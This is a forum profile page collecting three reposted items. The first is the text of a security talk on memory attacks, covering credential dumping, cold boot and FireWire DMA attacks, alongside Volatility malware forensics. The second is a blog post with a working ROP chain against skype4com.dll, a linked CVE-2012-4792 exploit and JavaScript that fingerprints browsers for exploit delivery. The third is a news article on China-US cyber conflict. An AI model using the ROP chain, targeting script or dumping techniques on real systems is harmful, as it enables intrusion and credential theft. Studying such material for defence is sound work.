Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. [h=3]Manipulating Memory for Fun and Profit by Frédéric Bourla - High-Tech Bridge[/h]I am sure you remember excellent reverse engineering presentations by High-Tech Bridge experts I posted earlier. High-Tech Bridge presented at the ISACA event in Luxembourg and you can download their detailed and very interesting presentation: “Manipulating Memory for Fun and Profit". The presentation includes detailed memory forensics process using Volatility by Frédéric BOURLA Chief Security Specialist Head of Ethical Hacking & Computer Forensics Departments High-Tech Bridge SA Table of Contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion Download the full presentation in PDF The text of the presentation (for Google search and to get an idea about the contents:) ======================== Manipulating Memory for Fun & Profit 6 February 2013 Frédéric BOURLA Chief Security Specialist ======================== # readelf prez * Slides & talk in English. * Native French speaker, so feel free to send me an email in French if case of question. * Talk focused on Memory Manipulation, from both offensive and defensives angles. * 1 round of 45’. * Vast topic, lots of issues to address, and lots of slides so that the most technical of you can come back later to remember commands. * Therefore some slides [specially the beginning] will be fast, but everything is summarized in demos. * No need to take notes, the whole slides and demos will be published on High-Tech Bridge website. ======================== # readelf prez * Despite its name, this talk will not deal with Total Recall or any other human memory manipulation based movie. * Nor will it deal with classical binary exploitation, such as Stack based Buffer Overflows or Heap Spraying. I strongly advice to read corelanc0d3rs’ papers on corelan.be to learn more regarding Exploit Writing. ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== # man mem * RAM (Random Access Memory) is a temporary memory accessible by the CPU in order to hold all of the program code and data that is processed by the computer. * It is called “random” because the system can directly access any of the memory cells anywhere on the RAM chip if it knows its row (i.e. “address”) and its column (i.e. “data bit”). * It is much faster to access data in RAM than on the hard drive. * CPU and OS determine how much and how the available memory will be used. ======================== # man mem * In other words, most users do not have any control on memory, which makes RAM a target of choice. * First systems were arbitrary limited to 640Kb RAM. Bill Gates once declared that “640K ought to be enough for anybody”. * At this time it was far enough… But today the OS itself can consume 1 Gb. We therefore use much more memory. * On a 32 bits Windows system, OS can directly address 2^32 cells, and is therefore mathematically limited to 4 Gb memory. ======================== # man mem * Contrary to popular assumption, RAM can retain its content up to several minutes after a shutdown. * Basically RAM is everywhere nowadays. Printers, fax, VoIP phones, GPS and smartphones are good examples. * This provide some opportunities to security professionals [and also to bad guys]. Some points of this talk can be applied to various targets and may not be limited to Windows systems, even if since now we will deal with a classical Microsoft host. ======================== # man mem * Upon process instantiation, the code is mapped in memory so that the CPU can read its instructions, and each process has his own virtual memory. * OS relies on page table structures to map transparently each virtual memory address to physical memory. * But most importantly, any program [including both its data and its instructions] must first be loaded into memory before being run by the processor. ======================== # man mem * For example, FUD Trojans which highly rely on Packers & Crypters can be quickly uncovered through memory analysis. * The same principle applies to OFTE. Memory Analysis can save your investigator's life, should you be facing a drive with On The Fly Encryption capabilities. To be efficient, transparent and usable, the [encrypted] key should be somewhere in memory. ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== Post keylogging capacities * A colleague just used your laptop to access a restricted page, and you regret you didn’t have time to run your favourite keylogger? :-] ======================== Post keylogging capacities * No a problem, you may be able to browse the Internet browser’s memory to grab his credentials. ======================== Post keylogging capacities * Besides this joke, have you ever wished you had saved your new email before a touchpad problem occurs and make you loose 30 minutes? ======================== Post keylogging capacities * But you may not be obliged to restart writing everything from scratch if you browse the process memory shortly. ======================== Stars revelation * In a pivoting attack, it can be very useful to reveal what’s behind the stars... Don’t forget, Windows remembers lots of passwords in behalf of users. * Lots of tools do exist, such as Snadboy's Revelation. Unfortunately, most of them do not work against recent OS. * BulletsPassView is one of the remaining tools which still works under Windows 7. There is even a 64 bits version. * Anyway, it also does not work under Windows 8. ======================== Stars revelation ======================== Stars revelation * Pillaging passwords often provide the keys of the kingdom. ======================== Memory Patching * Memory Patching is the first stone to build a Crack or create a Keygen in the Warez world. * It basically consists of locating and bypassing binary protections in memory in order to finally implement the trick in the targeted file. ======================== Memory Fuzzing * Fuzz Testing, aka Fuzzing, consists in providing invalid, unexpected, or random data to the inputs of a monitored program to detect security issues [among others]. * General approach to Fuzzers: ======================== Memory Fuzzing * Memory-oriented Fuzzing: ======================== Memory Fuzzing * Here is an example from dbgHelp4j, a memory fuzzing project under development at High-Tech Bridge: * To learn more, read Xavier ROUSSEL’s paper. * This short demonstration shows how dbgHelp4j permits to identify rapidly an old buffer overflow in the CWD Command of Easy FTP Server v1.7.0.11. ======================== DLL Injection * Another well-known memory abuse consists in injecting arbitrary code into the memory space of another process, for example through a CreateRemoteThread like function. * Such an injection permits the attacker to benefit from the rights of the target process, and often to bypass firewalls. * This also enable its author to hide himself from most users, as threads are not displayed in Windows Task Manager. ======================== DLL Injection * Native task manager does not display current threads within a process. ======================== DLL Injection * Here a DLL based Reverse Trojan is injected into IE memory space. ======================== DLL Injection * Trojan reaches its C&C Server via HTTP through Internet Explorer [whose behaviour sounds right]. ======================== DLL Injection * From a Pivoting Attack point of view, DLL Injection is widely used during Privilege Escalation. * There are a lot of tools, such as CacheDump, PWDump6, LSADump2 or PWDumpX. * Most tools actually inject their nasty code into the Local Security Authority Subsystem (LSASS) to reach hashes. * The latter is amazingly efficient and permits a user with administrative privileges to retrieve [either locally or remotely] the domain password cache, password hashes and LSA secrets from a Windows system. ======================== Process Memory Dump * Some processes write sensitive data in memory in clear text format, or without relying on heavy encryption. * Specific process memory dumps may allow an attacker to grab interesting data. * Lots of tools do exist. One of the best ones is probably ProcDump, from Mark Russinovich. * It’s a powerful command-line utility which primary purpose is to monitor applications for CPU spikes in order to generate a crash dump with the purpose of helping the developer to debug. ======================== Process Memory Dump * It has plenty of amazing features. Anyway, here our goal is simply to dump the memory contents of a process to a file [without stopping the process of course]. * So lots of tools can also do the job, such as PMDump from NTSecurity. * Sometimes we can find very sensitive information, such as usernames, computer names, IP addresses, and even passwords. * This is for example the case if you dump the memory of PwSafe. Not all fields are encrypted in memory. ======================== Process Memory Dump * For sure, password fields are not stored in memory in plaintext, but unfortunately other fields are. And sysadmin’s notes are often very juicy... * There is hope to collect credentials, map network resources, identify services, ports, sudoers account, and so on. * Even if the auditor is unlucky and does not grab passwords, he can still create a user list file for further dictionary attacks. ======================== Process Memory Dump * Process Memory Dump files are quite light. * During a Pivoting Attack in an Internal Penetration Test, it may worth a try to launch a memory dump against sensitive processes. ======================== Process Memory Dump * Something as easy as parsing the process memdump for strings may reveal interesting stuff to a pentester. ======================== Process Memory Dump * Here the Password Safe application permits an attacker to fingerprint the network, and to collect usernames, IP addresses and ports. * Very useful to carry out further attacks. ======================== Process Memory Dump * Here the network administration tool mRemote leaks internal path, IP address and TCP port of an SSH enabled server… As well as the username & password of a root account! ======================== Full Memory Dump * If you have a good bandwidth and you are not so limited by the time, why not dumping the whole memory? * An offline analysis of the whole memory dump may even reveal more important stuff. Even in the case of FDE, users may have opened sensitive TXT documents for example. * You may add DumpIt to your toolkit. It is a one-click memory acquisition application for Windows released by MoonSols. It’s a great tool which combines win32dd and win64dd in one executable. It is fast, small, portable, free and ultra easy to use. Just run in to dump the physical memory in the current directory. ======================== Cold Boot Attacks * It is a common belief that RAM looses its content as soon as the power is down. * This is wrong, RAM is not immediately erased. It may take up to several minutes in a standard environment, even if the RAM is removed from the computer. * And it may last much longer if you cool the DRAM chips. With a simple dusty spraying at -50°C, your RAM data can survive more that 10 minutes. * If you cool the chips at -196°C with liquid nitrogen, data are hold for several hours without any power. ======================== Cold Boot Attacks * It is then possible to plug the RAM in another system to dump their content to carry out an offline analysis. * In particular, encryption tools deeply rely on RAM to store their keys. Therefore such attacks are mostly aimed to defeat FDE, such as BitLocker, FileVault, dm-crypt, and TrueCrypt. * And even if there is some kinds of degradation in the memory contents, some algorithms can intelligently recover the keys. * To know more, read the Princeton University's paper. ======================== DMA based attacks * IEEE1394, aka FireWire, is a serial bus interface standard for high-speed communications and isochronous real-time data transfer. * According to Wikipedia, it “supports DMA and memory-mapped devices, allowing data transfers to happen without loading the host CPU with interrupts and buffer-copy operations”. * In other words, you can read [and write] in the target’s memory through its FireWire interface! * This security problem is not new [2004], but still exists today as it relies in IEEE 1394 specifications. ======================== DMA based attacks * A few years ago, attackers could use WinLockPwn. Today they have Inception tool, from ntropy. * Inception is a physical memory manipulation and hacking tool which nicely exploits IEEE 1394 SBP-2 DMA [Serial Bus Protocol 2]. * The tool can unlock and escalate privileges to Administrator / Root on almost any powered on machine you have physical access to. * The tool works over any interface that expands and can master the PCIe bus, such as FireWire, Thunderbolt, ExpressCard and PCMCIA (PC-Card). ======================== DMA based attacks * It is initially made to attack computers that utilize FDE, such as BitLocker, FileVault, TrueCrypt or Pointsec. * You just need a Linux / Mac OS X system and a target which provides a FireWire / Thunderbolt interface, or an ExpressCard / PCMCIA expansion port. * There are for sure some limitations, such as the 4 GiB RAM bugs or the restrictions on OS X Lion targets [which disables DMA when the user is logged out as well as when the screen is locked if FileVault is enabled], but most often FireWire means P0wned. ======================== DMA based attacks * Just a few lines to install on a your BackTrack: * The short following demo of Inception exploits the FireWire interface of an up-to-date Windows 7 system to patch the msv1_0.dll file and unlock the running session. ======================== DMA based attacks * This kind of DMA based attacks also permit to attack mounted encrypted volumes, such as a TrueCrypt archive. * You can for example boot your attacking system with PassWare FireWire Memory Imager from Passware Kit Forensics, and search for AES keys in the target memory through FireWire. * You can basically defeat BitLocker, TrueCrypt, FileVault2 & PGP encryption volumes. * To know more: http://www.breaknenter.org/projects/inception/ http://support.microsoft.com/kb/2516445 ======================== DMA based attacks * The following slides illustrate an attack on a TrueCrypt volume created on an 8 Gb memory stick. * First step was to backup the encrypted drive. ======================== DMA based attacks * Then let’s begin the attack on a mounted volume when the user went. ======================== DMA based attacks * Dump the physical memory of the target system through our favourite FireWire interface. ======================== DMA based attacks * And attack the key material in memory… ======================== DMA based attacks * The attack only last a couple of minutes. ======================== DMA based attacks * And you should get an unencrypted raw volume. ======================== DMA based attacks * You just have to fill a new memory stick with this raw image… ======================== DMA based attacks * And that’s it ! Just plug your new device… ======================== DMA based attacks * And enjoy your TrueCrypt less volume. ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== Circumventing FDE * Traditional Forensics approach faces problem with encryption, especially with FDE. * If the investigator “pulls the plug” and creates a bit-for-bit image of the physical hard drive, he most probably destroys the best chance of recovering the plaintext data, as well as all common memory artefacts. * With FDE, it is usually far better to make a bit-for-bit image of the logical device while the system is still running, even if underlines disk activities are generally not welcome… And even if we rely on an untrusted OS to present what is actually on the disk, therefore prone to anti-forensic techniques. ======================== Circumventing FDE * If we begin by capturing the volatile memory, then we can potentially extract the cryptographic keys from the memory image to decrypt and analyse the disk image. * The only one challenge usually consists in uniquely identifying key materials among gigabytes of other data. * It is usually achieved with a mixed of entropy analysis [limited because of the short length of symmetrical keys and the randomness of other data, such as compressed files] and brute force attack [Known-Plaintext Attack, where the attacker has samples of both the plaintext and the ciphertext]. * To learn more: “RAM is Key - Extracting Disk Encryption Keys From Volatile Memory", by B. Kaplan and M. Geiger). ======================== Code Analysis via API Hooking * A quick way to have an idea of what a binary does is to analyse its API calls. * You can do it easily with APISpy32 for example, from Pietrek. * You just need to populate a configuration file with the name of all the API [e.g. per a strings] you want to enable Hooking, and you get a nice malcode monitoring tool. * Next slide shows common API use in malware. ======================== Code Analysis via API Hooking Common API Malware URLDownloadToFile, FtpGetFile, FtpOpenFile Dropper CreateRemoteThread, NtWriteVirtualMemory, LoadLibrary and similar (LoadLibraryA, LoadLibraryExA, LoadLibraryExW, etc.) Injection BeginPaint (to disable local screen changes when a VNC session is activated) Zeus Accept, Bind Backdoor Connect, CreateNamedPipe, ConnectNamedPipe, DisconnectNamedPipe Dropper and Reverse Trojan IsDebuggerPresent, CheckRemoteDebuggerPresent Anti debugger ======================== Code Analysis via API Hooking Common API Malware CryptCreateHash, CryptEncrypt, CryptGetHashParam Encryption DeviceIoControl, NtLoadDriver, NtOpenProcess Rootkit HttpOpenRequest, HttpSendRequest, InternetConnect Exfiltration ModifyExcuteProtectionSupport, EnableExecuteProtectionSupport, NtExecuteAddFileOptOutList DEP SetSfcFileException Windows File Protection alteration ======================== Memory Forensics * It is probably the best way to identify the most hidden evil code, such a Rootkits. * And don't forget that some malware can live in memory without ever touching the hard disk. This is for example the case with MSF Meterpreter, which is injected into existing process memory. * Stealth malware also work in that manner [mostly in targeted hacking against big companies]. * Hard disks are amazingly big today. Simply creating a raw image can take very long time... Sometimes several days. Analysing memory is much faster. ======================== Memory Forensics * But there are also some minor drawbacks… Indeed, the memory image will only give us information on what was running at a particular time. We will not see the most visible piece of malcode if it was not running when we proceed with the imaging [unless some tracks remain in undeleted structures]. * And fore sure, to make an image of the memory we first need to run once a specific utility... Which will be loaded in the targeted memory! As a consequence, it is always possible to alter evidence [even if chances are really low with a light utility]. * Anyway, it definitely worth a try as a fast analysis can help you spot the evidence very quickly. :-] ======================== Memory Forensics * Any kind of physical memory abstract could be usable, such as a Memory Dump, a Crash Dump, an hibernation file or a VMEM file for virtual machines. ======================== Memory Forensics * Memory Forensics is a very huge project, as memory mappings differ from OS, SP and patch levels, and as vendors usually do not really document their internal memory structures. * Nevertheless, it is mature and efficient since a few years. Nowadays, we are not limited anymore to ASCI and Unicode grep, and we can now rely on powerful tools which parse well known memory structures. ======================== Memory Forensics * For sure, we are still facing challenging problems, and tools may be limited by Paging and Swapping which can prevent investigators from analysing the whole virtual address space of a specific process [unless they also dig into the pagefile.sys for example]… * But it is still really effective for Malware Analysis! * Besite commercial tools, free solutions do exist, such as Radare and Volatility. The later simply became impressing. * Since last year, Volatility also support MAC systems. ======================== Memory Forensics * Shall you need to carry out a Memory Forensics on a Windows, Linux, Mac or Android system, I strongly advise you to have a look on Volatility. * It is basically a Python based tool for extracting digital artefacts from volatile memory [RAM] samples which offer an amazing visibility in the runtime state of the system. * You can easily identify running processes and their DLL, Virtual Address Descriptor [VAD], System call tables [IDT, GDT, SSDT], environment variables, network connections, open handles to kernel and executive objects, and so on. ======================== Memory Forensics * It can even be used to dump LM and NTLM hashes, as well as LSA secrets… ======================== Memory Forensics * Well, for French targets there is a little bug [because of accents]... You will have to adapt a little bit the code: ======================== Memory Forensics * But beside this, it is really efficient to track malcode. Let’s dig into a real example… ======================== Memory Forensics * Heavy malware may be digitally signed by a trusted CA. ======================== Memory Forensics * And may be really appear benign to your users. ======================== Memory Forensics * Here it was an obfuscated .Net based Dropper. ======================== Memory Forensics * Even if you manually find the embedded payload, nearly everything is packed to disturb Reverse Engineers. ======================== Memory Forensics * The only one unencrypted payload was a kind of anti-restoring feature, which basically hooks specific API to prevent system administrators to remove the malware [e.g. by killing his task manager]. * And then? What’s next? We could spend lots of time in a Reverse Engineering phase, or analyse its behaviour in a sandbox [if the code doesn’t detect it]… * …And we can simply see what’s happen in memory. ======================== Memory Forensics * Just infect voluntarily your VM or your lab workstation. * And use one of the good existing tools to dump the whole memory: * Memory from Mandiant * FTK Imager from AccessData * FastDump from HB Gary * DumpIt and Win32dd / Win64dd from Moonsols * And of course your favourite FireWire interface * Before using Volatility to dissect this memory dump. ======================== Memory Forensics * Let’s begin to get basic information on our dump file. ======================== Memory Forensics * The PSLIST command quickly show processes. ======================== Memory Forensics * You can arrange them by tree view. ======================== Memory Forensics * This process list can be quickly obtained by parsing a Kernel double chained list. Nevertheless, this list can be altered by malware, such as Rootkits, which therefore hide themselves from common system tools. * A deep research can then be achieved, which consist in parsing the whole memory dump to locate EPROCESS structures. These Kernel structures do exist for each process, no matter what the double chained list [known as Process Control Block] is. * A process listed in a PSCAN and not in a PSLIST often indicate a threat [mostly permitted via API Hooking]. ======================== Memory Forensics * The PSCAN is longer but may reveal hidden code. ======================== Memory Forensics * Similarly, you can find processes which attempt to hide themselves on various process listings through the PSXVIEW command: ======================== Memory Forensics * Several Volatility commands works in this way and offer a SCAN variant to try to recognize specific structures in memory, thus revealing hidden sockets and connections for example. * For sure you may have [often quickly identified] false positives, as some process may gave been legitimately closed for example, thus letting some orphan EPROCESS data structures in RAM. * Nevertheless, some process may still be really running, and therefore instantaneously reveal a serious security issue. ======================== Memory Forensics * Established and recently closed connexions are also quickly revealed. ======================== Memory Forensics * And you can also easily explore the registry, which is widely used by malcode writers for various purpose [e.g. to permit their code to survive reboot]. ======================== Memory Forensics * As well querying loaded drivers [often used by Rootkits]. ======================== Memory Forensics * You can even parse loaded libraries to detect API Hooking, also widely used by Rootkits. Here a trampoline has been placed in the wbemcomm DLL [to hook certain WMI queries]. ======================== Memory Forensics * You can extract suspicious file [through PID or offset] from the memory dump to carry out further investigation. ======================== Memory Forensics * And quickly identify a Key Logger. ======================== Memory Forensics * In fact, you can enumerate all opened files and even loaded DLL within a specific process… And drop them back on disk for investigation. ======================== Memory Forensics * The dumped process may not be runable, but would still offer you a quite easy to understand code [at least you don't have anymore to unpack it]. For example: strings dumpedfile | egrep -i 'http|ftp|irc|\.exe' * Even more powerful, you can rely on the MALFIND command to perform advanced search using Regex, Unicode or ANSI strings... * And most importantly, it permits to quickly find hidden or injected code through the VAD tree inspection [very useful in case of DLL which may have been unlinked from the LDR lists by the malcode loader in order to avoid its detection]. ======================== Memory Forensics * Here the MALFIND command reveals that an arbitrary code was injected into the CRSS.exe system process. ======================== Memory Forensics * We can quick parse MALFIND results to bring out running processes which were infected by such code injection. ======================== Memory Forensics * Even powerful rootkits quickly draw your attention. ======================== Memory Forensics * We can also use the Yara malware identification feature to directly scan for patterns inside a PID or within a specific memory segment. Here we see that an injected code inside the SVCHOST process established a connection to dexter.servequake.com:4444 via HTTP and download the 1234567890.functions resource. ======================== Memory Forensics * For sure, the RAT payload is encrypted, but in a few minutes you identified the threat and dig quite deeply into the real problem. ======================== Memory Forensics * You can now extract the guilty binary code along with the related memory segments and begin a classical malware analysis. ======================== Memory Forensics * And if you like high-level view for your incident report, why not extend Volatility with Graphviz to make something more visual? ======================== Memory Forensics * That’s it. I hope I have piqued your interest with one of the most important Forensics innovations of those last few years. The whole demo is attached here. * To learn more: SANS Forensics 610 Training Course [GREM] https://www.volatilesystems.com/default/volatility http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx http://www.ualberta.ca/CNS/RESEARCH/LinuxClusters/mem.html http://www.tenouk.com/visualcplusmfc/visualcplusmfc20.html ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== Conclusion * I hope I have achieved my goal of opening the doors to a fascinating world which could easily allow security analysts to save lots of time during their recurrent duties… * …And that you will see your own system [and the ones you asses] from a different angle. * …And that you will now have the reflex of dumping the whole memory in case of incident. * …And that you will reconsider security when the physical aspect in concerned. :-] Sursa: contagio: Manipulating Memory for Fun and Profit by Frédéric Bourla - High-Tech Bridge
  2. [h=2]Bypassing Windows ASLR using “skype4COM” protocol handler[/h] While investigating an unrelated issue using SysInternals Autoruns tool I spotted a couple of protocol handlers installed on the system by Skype. Knowing that protocol handlers can be loaded by Internet Explorer without any prompts I decided to check if these libraries have there dynamic base bits set. It turns out that the “skype4com.dll” library has not which means it could be used to bypass Windows ASLR so I got to work writing my rop chain and testing it out. A quick test to see if it indeed loads up can be done from the code below <SCRIPT language="JavaScript"> location.href = 'skype4com:' </SCRIPT> Filename - Skype4COM.dll Path - C:\Program Files\Common Files\Skype\ MD5 hash - 6e04c50ca4a3fa2cc812cd7ab84eb6d7 Size - 2,156,192 bytes Signed - 03 November 2011 11:46:40 Version - 1.0.38.0 and here is my rop chain without any nulls. 0x28025062 # POP EBX # RETN 0xa13fcde1 # 0xA13FCDE1 0x28024f71 # POP EAX # RETN 0x5ec03420 # 0x5EC03420 0x28027b5c # ADD EBX,EAX # XOR EAX,EAX # RETN (EBX=0x201, 513 bytes) 0x28024f71 # POP EAX # RETN 0xa13fcde1 # 0xA13FCDE1 0x280b4654 # ADD EAX,5EC0325F # RETN 0x28099a83 # MOV EDX,EAX # MOV EAX,ESI # POP ESI # RETN (EDX=0x40) 0x41414141 # Compensate 0x28017271 # POP ECX # RETN 0x280de198 # VirtualProtect() pointer [IAT] 0x28027b5b # MOV EAX,DWORD PTR DS:[ECX] # RETN 0x28041824 # XCHG EAX,ESI # ADD EAX,48C48300 # RETN 0x08 0x2806405a # POP EBP # RETN 0x41414141 # Compensate 0x41414141 # Compensate 0x280bc55b # & push esp # ret 0x28017271 # POP ECX # RETN 0x28126717 # &Writable location 0x28098730 # POP EDI # RETN 0x28098731 # RETN (ROP NOP) 0x28024f71 # POP EAX # RETN 0x90909090 # nop 0x28043527 # PUSHAD # RETN I’ve created an exploit using this rop chain on the “CButton Object Use-After-Free vulnerability” (CVE-2012-4792) taken from Metasploit. It has been tested on Windows 7 Enterprise (32bit) in VM with the latest version of Skype installed (6.2.59.106). The exploit can be downloaded from here, the password is “exploit” and the md5 hash of the zip file is 4d5735ff26b769abe1b02f74e2871911 Mitigation? Well I said it before and I’ll say it again . . . “EMET” your machines ASAP On something off topic, I was looking at the html code posted on Pastebin for the CVE-2012-4792 exploit and liked the way it checked to see if Office 2010 or 2007 was installed. Some blog posts weren’t as clear as to what the Office check routine was actually doing but really it was just determining which hxds.dll version to use for its rop chain for the Office version it detected. (I haven’t got the actual exploit files to confirm though but I’m pretty sure). For Office 2010 it installs 4 OpenDocuments ActiveX objects SharePoint.OpenDocuments.4 SharePoint.OpenDocuments.3 SharePoint.OpenDocuments.2 SharePoint.OpenDocuments.1 and Office 2007 only 3 SharePoint.OpenDocuments.3 SharePoint.OpenDocuments.2 SharePoint.OpenDocuments.1 So basically if the JavaScript is able to load “SharePoint.OpenDocuments.4? then it knows that it’s Office 2010. Since these ActiveX controls can be run without permissions no prompts are given. Below is a simple script that could be used if say in this example checking Windows 7 with IE8 has got installed Office 2007/2010 or Java 6. No Skype ActiveX controls gets installed that can be run without permissions so I couldn’t work out how to check if Skype is installed without triggering prompts in Internet Explorer. If you do know how to check without triggering prompts please do share. <HTML> <SCRIPT language="JavaScript"> // // if (CheckIEOSVersion() == "ie8w7") { if (CheckOfficeVersion() == "Office2010") { // Exploit call here } else if (CheckOfficeVersion() == "Office2007") { // Exploit call here } else if (JavaVersion() == "Java6") { // Exploit call here } else if (SkypeCheck() == "") { // Exploit call here } } // // function CheckIEOSVersion() { var agent = navigator.userAgent.toUpperCase(); var os_ie_ver = ""; // if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 7') > -1)) os_ie_ver = "ie7wxp"; if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 8') > -1)) os_ie_ver = "ie8wxp"; if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 7') > -1)) os_ie_ver = "ie7wv"; if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 8') > -1)) os_ie_ver = "ie8wv"; if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 8') > -1)) os_ie_ver = "ie8w7"; if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 9') > -1)) os_ie_ver = "ie9w7"; if ((agent.indexOf('NT 6.2') > -1)&&(agent.indexOf('MSIE 10') > -1)) os_ie_ver = "ie10w8"; return os_ie_ver; } // // function CheckOfficeVersion() { var offver = ""; var checka = 0; var checkb = 0; // try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {} try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {} // if ((typeof checka) == "object" && (typeof checkb) == "object") offver = "Office2010"; else if ((typeof checka) == "number" && (typeof checkb) == "object") offver = "Office2007"; // return offver; } // // function JavaVersion() { var javver = ""; var javaa = 0; // try { javaa = new ActiveXObject("JavaWebStart.isInstalled.1.6.0.0"); } catch (e) {} // if ((typeof javaa) == "object") javver = "Java6"; // return javver; } // // function SkypeCheck() { var skypever = ""; return skypever; } // // </SCRIPT> </HTML> Sursa: Bypassing Windows ASLR using “skype4COM” protocol handler | GreyHatHacker.NET
  3. [h=1]In Cyberspace, New Cold War[/h][h=6]By DAVID E. SANGER[/h] [h=6]Published: February 24, 2013[/h]WASHINGTON — When the Obama administration circulated to the nation’s Internet providers last week a lengthy confidential list of computer addresses linked to a hacking group that has stolen terabytes of data from American corporations, it left out one crucial fact: that nearly every one of the digital addresses could be traced to the neighborhood in Shanghai that is headquarters to the Chinese military’s cybercommand. That deliberate omission underscored the heightened sensitivities inside the Obama administration over just how directly to confront China’s untested new leadership over the hacking issue, as the administration escalates demands that China halt the state-sponsored attacks that Beijing insists it is not mounting. The issue illustrates how different the worsening cyber-cold war between the world’s two largest economies is from the more familiar superpower conflicts of past decades — in some ways less dangerous, in others more complex and pernicious. Administration officials say they are now more willing than before to call out the Chinese directly — as Attorney General Eric H. Holder Jr. did last week in announcing a new strategy to combat theft of intellectual property. But President Obama avoided mentioning China by name — or Russia or Iran, the other two countries the president worries most about — when he declared in his State of the Union address that “we know foreign countries and companies swipe our corporate secrets.” He added: “Now our enemies are also seeking the ability to sabotage our power grid, our financial institutions and our air traffic control systems.” Defining “enemies” in this case is not always an easy task. China is not an outright foe of the United States, the way the Soviet Union once was; rather, China is both an economic competitor and a crucial supplier and customer. The two countries traded $425 billion in goods last year, and China remains, despite many diplomatic tensions, a critical financier of American debt. As Hillary Rodham Clinton put it to Australia’s prime minister in 2009 on her way to visit China for the first time as secretary of state, “How do you deal toughly with your banker?” In the case of the evidence that the People’s Liberation Army is probably the force behind “Comment Crew,” the biggest of roughly 20 hacking groups that American intelligence agencies follow, the answer is that the United States is being highly circumspect. Administration officials were perfectly happy to have Mandiant, a private security firm, issue the report tracing the cyberattacks to the door of China’s cybercommand; American officials said privately that they had no problems with Mandiant’s conclusions, but they did not want to say so on the record. That explains why China went unmentioned as the location of the suspect servers in the warning to Internet providers. “We were told that directly embarrassing the Chinese would backfire,” one intelligence official said. “It would only make them more defensive, and more nationalistic.” That view is beginning to change, though. On the ABC News program “This Week” on Sunday, Representative Mike Rogers, Republican of Michigan and chairman of the House Intelligence Committee, was asked whether he believed that the Chinese military and civilian government were behind the economic espionage. “Beyond a shadow of a doubt,” he replied. In the next few months, American officials say, there will be many private warnings delivered by Washington to Chinese leaders, including Xi Jinping, who will soon assume China’s presidency. Both Tom Donilon, the national security adviser, and Mrs. Clinton’s successor, John Kerry, have trips to China in the offing. Those private conversations are expected to make a case that the sheer size and sophistication of the attacks over the past few years threaten to erode support for China among the country’s biggest allies in Washington, the American business community. “America’s biggest global firms have been ballast in the relationship” with China, said Kurt M. Campbell, who recently resigned as assistant secretary of state for East Asia to start a consulting firm, the Asia Group, to manage the prickly commercial relationships. “And now they are the ones telling the Chinese that these pernicious attacks are undermining what has been built up over decades.” It is too early to tell whether that appeal to China’s self-interest is getting through. Similar arguments have been tried before, yet when one of China’s most senior military leaders visited the Joint Chiefs of Staff at the Pentagon in May 2011, he said he didn’t know much about cyberweapons — and said the P.L.A. does not use them. In that regard, he sounded a bit like the Obama administration, which has never discussed America’s own cyberarsenal. Yet the P.LA.’s attacks are largely at commercial targets. It has an interest in trade secrets like aerospace designs and wind-energy product schematics: the army is deeply invested in Chinese industry and is always seeking a competitive advantage. And so far the attacks have been cost-free. American officials say that must change. But the prescriptions for what to do vary greatly — from calm negotiation to economic sanctions and talk of counterattacks led by the American military’s Cyber Command, the unit that was deeply involved in the American and Israeli cyberattacks on Iran’s nuclear enrichment plants. “The problem so far is that we have rhetoric and we have Cyber Command, and not much in between,” said Chris Johnson, a 20-year veteran of the C.I.A. team that analyzed the Chinese leadership. “That’s what makes this so difficult. It’s easy for the Chinese to deny it’s happening, to say it’s someone else, and no one wants the U.S. government launching counterattacks.” That marks another major difference from the dynamic of the American-Soviet nuclear rivalry. In cold war days, deterrence was straightforward: any attack would result in a devastating counterattack, at a human cost so horrific that neither side pulled the trigger, even during close calls like the Cuban missile crisis. But cyberattacks are another matter. The vast majority have taken the form of criminal theft, not destruction. It often takes weeks or months to pin down where an attack originated, because attacks are generally routed through computer servers elsewhere to obscure their source. A series of attacks on The New York Times that originated in China, for example, was mounted through the computer systems of unwitting American universities. That is why David Rothkopf, the author of books about the National Security Council, wrote last week that this was a “cool war,” not only because of the remote nature of the attacks but because “it can be conducted indefinitely — permanently, even — without triggering a shooting war. At least, that is the theory.” Administration officials like Robert Hormats, the under secretary of state for business and economic affairs, say the key to success in combating cyberattacks is to emphasize to the Chinese authorities that the attacks will harm their hopes for economic growth. “We have to make it clear,” Mr. Hormats said, “that the Chinese are not going to get what they desire,” which he said was “investment from the cream of our technology companies, unless they quickly get this problem under control.” But Mr. Rogers of the Intelligence Committee argues for a more confrontational approach, including “indicting bad actors” and denying visas to anyone believed to be involved in cyberattacks, as well as their families. The coming debate is over whether the government should get into the business of retaliation. Already, Washington is awash in conferences that talk about “escalation dominance” and “extended deterrence,” all terminology drawn from the cold war. Some of the talk is overheated, fueled by a growing cybersecurity industry and the development of offensive cyberweapons, even though the American government has never acknowledged using them, even in the Stuxnet attacks on Iran. But there is a serious, behind-the-scenes discussion about what kind of attack on American infrastructure — something the Chinese hacking groups have not seriously attempted — could provoke a president to order a counterattack. Sursa: http://www.nytimes.com/2013/02/25/world/asia/us-confronts-cyber-cold-war-with-china.html?_r=0
